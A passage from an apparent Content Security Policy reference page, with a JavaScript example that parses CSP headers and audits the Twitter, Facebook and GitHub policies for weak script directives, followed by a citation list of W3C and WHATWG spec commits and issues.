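The three policies quoted above ([195] Twitter, [196] Facebook, [197] GitHub) differ a lot in how much XSS protection they actually buy. The block below is an added example, not code from the original page and not anything published by Twitter, Facebook or GitHub: a small CSP parser plus the checks a reviewer applies to the script-related directives before trusting a policy. It follows the directive-name case-insensitivity change cited in [214] (names are lowercased; nonce and hash values are not, because they are base64). The function names (`parsePolicy`, `auditScriptPolicy`, ...) and the finding codes are this example's own, and the three sample policies are shortened, constructed copies of the quoted headers.

```javascript
// Added example, not code from the original page nor from Twitter, Facebook or
// GitHub: a minimal CSP parser and the checks a reviewer runs over a policy's
// script-related directives. Runs offline on the constructed policies below.

// Split a serialized policy into a Map of directive name -> source list.
// Directive names are ASCII case-insensitive, so they are lowercased here;
// a directive repeated within one policy is ignored after its first
// occurrence, which is what browsers do.
function parsePolicy(serialized) {
  const directives = new Map();
  for (const token of serialized.split(';')) {
    const parts = token.trim().split(/[\t\n\f\r ]+/).filter(Boolean);
    if (parts.length === 0) continue;
    const name = parts[0].toLowerCase();
    if (!directives.has(name)) directives.set(name, parts.slice(1));
  }
  return directives;
}

// Keyword and scheme sources ('self', 'unsafe-inline', data:) are matched
// case-insensitively; nonce and hash values are base64 and stay as-is.
function isKeyword(src, keyword) {
  return src.toLowerCase() === keyword;
}
function hasNonceOrHash(list) {
  return list.some((src) => /^'(nonce|sha(256|384|512))-[^']+'$/i.test(src));
}

// Fetch directives fall back to default-src when they are absent.
function effective(directives, name) {
  return directives.get(name) ?? directives.get('default-src') ?? null;
}

// Return the list of findings (empty when the script policy is strict).
function auditScriptPolicy(serialized) {
  const d = parsePolicy(serialized);
  const findings = [];
  const script = effective(d, 'script-src');
  if (script === null) {
    findings.push('no-script-restriction');
  } else {
    // 'unsafe-inline' is ignored when a nonce or hash is present (CSP2 and
    // later); without one it re-enables every injected inline script.
    if (script.some((s) => isKeyword(s, "'unsafe-inline'")) && !hasNonceOrHash(script)) {
      findings.push('unsafe-inline-script');
    }
    if (script.some((s) => isKeyword(s, "'unsafe-eval'"))) findings.push('unsafe-eval');
    // '*' matches any host-source; data: lets <script src="data:..."> run.
    if (script.some((s) => s === '*')) findings.push('wildcard-script-source');
    if (script.some((s) => isKeyword(s, 'data:'))) findings.push('data-uri-script');
  }
  // Plugins (<object>/<embed>) can execute script too, so object-src must be
  // restricted, either directly or through a restrictive default-src.
  const object = effective(d, 'object-src');
  if (object === null || object.some((s) => s === '*')) findings.push('plugins-from-anywhere');
  // Without base-uri an injected <base href> redirects every relative script URL.
  if (!d.has('base-uri')) findings.push('base-uri-missing');
  return findings;
}

// Constructed sample policies: shortened copies of the headers quoted above.
const TWITTER = "script-src https://connect.facebook.net 'nonce-OYd+Tgp6EYGXSARn0PRbbg==' https://twitter.com 'unsafe-eval' https://*.twimg.com blob: 'self'; frame-ancestors 'self'; object-src https://twitter.com https://pbs.twimg.com; default-src 'self' blob:";
const FACEBOOK = "default-src * data: blob:;script-src *.facebook.com *.fbcdn.net 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' *";
const GITHUB = "default-src 'none'; base-uri 'self'; block-all-mixed-content; script-src assets-cdn.github.com; style-src 'unsafe-inline' assets-cdn.github.com; worker-src 'self'";

for (const [site, policy] of [['twitter', TWITTER], ['facebook', FACEBOOK], ['github', GITHUB]]) {
  console.log(site, auditScriptPolicy(policy));
}
```

Run with `node`, the output shows the spread: the GitHub policy yields no findings (`default-src 'none'` also closes the plugin hole even though `object-src` is not listed), the Twitter policy is nonce-based but still allows `eval` and lacks `base-uri`, and the Facebook policy combines `'unsafe-inline'` without a nonce, `'unsafe-eval'`, `data:` script sources and a wildcard `default-src` that `object-src` inherits, so it stops very little injected script. `'unsafe-inline'` in `style-src` is deliberately not flagged: it is a CSS-injection concern, not a script one.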


[198] [CITE@en[Editorial: set response's CSP list once]]
(by [[annevk]], [TIME[2018-04-17 20:27:15 +09:00]])
<https://github.com/whatwg/fetch/commit/860922f2c393c1b5408af7a80771c665b69a5bf7>

[199] [CITE@en[Should "set response's CSP list" be in Main fetch? · Issue #364 · whatwg/fetch]]
([TIME[2018-04-18 13:46:51 +09:00]])
<https://github.com/whatwg/fetch/issues/364>

[200] [CITE@en[Set response's CSP list once by annevk · Pull Request #701 · whatwg/fetch]]
([TIME[2018-04-18 13:47:46 +09:00]])
<https://github.com/whatwg/fetch/pull/701>

[201] [CITE@en[Editorial: lowercase content-security-policy <meta http-equiv> value]]
(by [[annevk]], [TIME[2018-04-28 01:45:22 +09:00]])
<https://github.com/whatwg/html/commit/e6a29247387e8f362654b280f72f746328667352>

[202] [CITE@en[Editorial: lowercase content-security-policy <meta http-equiv> value by annevk · Pull Request #3654 · whatwg/html]]
([TIME[2018-05-03 10:54:03 +09:00]])
<https://github.com/whatwg/html/pull/3654>

[203] [CITE@en[23357 – Subverting CSP policies for browser add-ons (extensions).]]
([TIME[2018-05-06 15:41:33 +09:00]])
<https://www.w3.org/Bugs/Public/show_bug.cgi?id=23357>

[204] [CITE@en[Refactored fetch directives for readability and logic. (#318)]]
(by [[andypaicu]], [TIME[2018-08-17 23:10:24 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/937f02478703c5eccfa56036712b514b08b3b700>

[205] [CITE@en[Refactored fetch directives for readability and logic. by andypaicu · Pull Request #318 · w3c/webappsec-csp]]
([TIME[2018-08-23 18:49:10 +09:00]])
<https://github.com/w3c/webappsec-csp/pull/318>

[206] [CITE@en[Using the correct directive name when reporting violations (#337)]]
(by [[andypaicu]], [TIME[2018-10-04 18:31:32 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/10294d4e51598dc67106ab51aee144fcf89e5c44>

[207] [CITE@en[Using the correct directive name when reporting violations by andypaicu · Pull Request #337 · w3c/webappsec-csp]]
([TIME[2018-10-22 01:18:23 +09:00]])
<https://github.com/w3c/webappsec-csp/pull/337>

[208] [CITE@en[The effective directive for violations is incorrect · Issue #324 · w3c/webappsec-csp]]
([TIME[2018-10-22 01:18:30 +09:00]])
<https://github.com/w3c/webappsec-csp/issues/324>

[209] [CITE@en[Fixing whitespace issues and 2 comments in the area (#340)]]
(by [[andypaicu]], [TIME[2018-10-08 19:08:35 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/7c675fc237e300c574f41101f502f51c6398c71a>

[210] [CITE@en[Fixing whitespace issues and 2 comments in the area by andypaicu · Pull Request #340 · w3c/webappsec-csp]]
([TIME[2018-10-30 23:48:52 +09:00]])
<https://github.com/w3c/webappsec-csp/pull/340>

[211] [CITE@en[Update comment of directive value parsing · Issue #307 · w3c/webappsec-csp]]
([TIME[2018-10-30 23:49:03 +09:00]])
<https://github.com/w3c/webappsec-csp/issues/307>

[212] [CITE@en[Grammar: Clarity regarding constraints applied to path-part (path-absolute) production · Issue #303 · w3c/webappsec-csp]]
([TIME[2018-10-30 23:49:22 +09:00]])
<https://github.com/w3c/webappsec-csp/issues/303>

[213] [CITE@en[CSP: clarify whitespace characters · Issue #5 · w3c/webappsec-csp]]
([TIME[2018-10-30 23:49:39 +09:00]])
<https://github.com/w3c/webappsec-csp/issues/5>

[214] [CITE@en[Directive names should be lowercased (basically case-insensitive) (#346)]]
(by [[andypaicu]], [TIME[2018-10-08 22:17:32 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/5c4813650bc2c4f39262ceedf50a92440eb182c7>

[216] [CITE@en[Directive names should be lowercased (basically case-insensitive) by andypaicu · Pull Request #346 · w3c/webappsec-csp]]
([TIME[2018-10-30 23:52:43 +09:00]])
<https://github.com/w3c/webappsec-csp/pull/346>

[218] [CITE@en[Case-sensitivity resulting in divergent browser behavior · Issue #236 · w3c/webappsec-csp]]
([TIME[2018-10-30 23:52:56 +09:00]])
<https://github.com/w3c/webappsec-csp/issues/236>

[220] [CITE@en[Updated published WD.]]
(by [[mikewest]], [TIME[2018-10-15 16:37:25 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/0e11091019856f6a4e2deba233787e7822c289d7>

[221] [CITE@en[Clone <iframe srcdoc>'s node document's CSP list]]
(by [[annevk]], [TIME[2018-10-12 16:32:38 +09:00]])
<https://github.com/whatwg/html/commit/ebf6d404858bd3d75ec29b4899866935a74c6dc6>

[222] [CITE@en[What does it mean to alias a policy from a CSP list? · Issue #207 · w3c/webappsec-csp]]
([TIME[2018-11-06 16:21:15 +09:00]])
<https://github.com/w3c/webappsec-csp/issues/207>

[223] [CITE@en[Is srcdoc aliasing its parent's CSP or copying it? · Issue #2594 · whatwg/html]]
([TIME[2018-11-06 16:21:55 +09:00]])
<https://github.com/whatwg/html/issues/2594>

[224] [CITE@en[Clone <iframe srcdoc>'s node document's CSP list by annevk · Pull Request #4083 · whatwg/html]]
([TIME[2018-11-06 16:22:45 +09:00]])
<https://github.com/whatwg/html/pull/4083>

[225] [CITE@en[Added a note about fetch redirects being covered (#359)]]
(by [[andypaicu]], [TIME[2018-11-06 18:28:59 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/df35fe41260ecd426e7f33dfa6bc1e0b432e1424>

[226] [CITE@en[Added a note about fetch redirects being covered by andypaicu · Pull Request #359 · w3c/webappsec-csp]]
([TIME[2019-03-08 12:27:50 +09:00]])
<https://github.com/w3c/webappsec-csp/pull/359>